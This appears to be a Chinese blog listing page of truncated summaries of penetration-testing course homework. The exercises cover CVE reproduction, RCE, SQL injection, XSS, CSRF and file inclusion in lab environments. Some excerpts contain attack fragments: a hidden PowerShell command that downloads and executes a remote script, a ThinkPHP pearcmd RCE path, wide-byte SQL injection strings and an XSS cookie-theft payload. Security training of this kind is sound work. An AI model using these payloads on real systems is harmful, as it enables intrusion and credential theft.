maoming

摘要： @所有人 网络安全C10-2024.12.7作业：WAF绕过文件上传实验。网络层面后门分析：课堂上演示了用蚁剑进行攻击并监听流量提取攻击特征，请任选渗透测试基础课程中学习的漏洞进行攻击并监听流量提取攻击特征。Sqlmap进行流量分析Windows提权实战，请使用除ms15-051以外的其他的exp进 阅读全文

摘要： 网络安全C10-2024.11.30@所有人 作业：CVE-2018-4878漏洞复现powershell -windowstyle hidden -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://10.0.0 阅读全文

摘要： MS08-067、MS10-018漏洞复现，对比bind和reverse攻击模式的区别 MS08-067 MS10-018 bind和reverse攻击模式的区别 Bind可以不要被攻击者执行默写操作，如访问网站等 Reverse有些情况下需要被攻击者访问经行某些操作，具体看其中payload 2、 阅读全文

摘要： @所有人 网络安全C10-2024.11.17作业：水平越权&垂直越权漏洞实验水平越权垂直越权密码修改逻辑漏洞实验3、验证码安全（1）验证码绕过（on client）+ 验证码绕过（on server）在client于server中由于验证码在使用后没有即使的在服务器段刷新或者作废，所以可以重复使用 阅读全文

摘要： @所有人 网络安全C10-2024.11.9作业：RCE：分别实现ThinkPHP、Weblogic、Shiro漏洞的利用过程ThinkPHP?lang=../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/< 阅读全文

摘要： 作业：1、文件包含（1）DVWA环境下去包含其他目录的任意3个文件，要求使用相对路径low等级Medium等级Higher等级（2）远程文件包含中间件日志包含绕过，要求使用蚁剑连接成功2、CSRF（1）DVWA-High等级初始值 Admin 密码123 pablo密码456通过xss获取pablo 阅读全文

摘要： @所有人 网络安全C10-2024.10.19作业：1、XSS（1）使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie，利用cookie实现登录<script>document.write('<img src="http://127.0.0.1:80/pikachu/pkx 阅读全文

摘要： 网络安全C10-2024.9.28 作业： 在不依赖于DVWA后端数据库的情况，如何通过前端验证的方法判断DVWA中的注入点是数字型注入还是字符型注入？（提示：用假设法进行逻辑判断） 在对注入点判断是哪种类型时，我们可以通过不断地尝试来进行判断，列入：1 1’--+ 1”--+ --+ 1’)--+ 阅读全文

摘要： 网络安全C10-2024.10.1作业：利用宽字节注入实现“库名-表名”的注入过程，写清楚注入步骤；a:爆库名1+%82%27++union+select+1,database%28%29%23&查表名1 %82' union select 1,group_concat(table_name) fr 阅读全文

摘要： @所有人网络安全C10-2024.9.21作业：安装burp，分别在本机上实现全局代理和局部代理，提供设置过程的说明文档；在edge浏览器设置全局代理，端口号8888此时股谷歌没有设置代理 利用burp实现对https站点的抓包；使用Burp的Discover Content功能爬取任意站点的目录， 阅读全文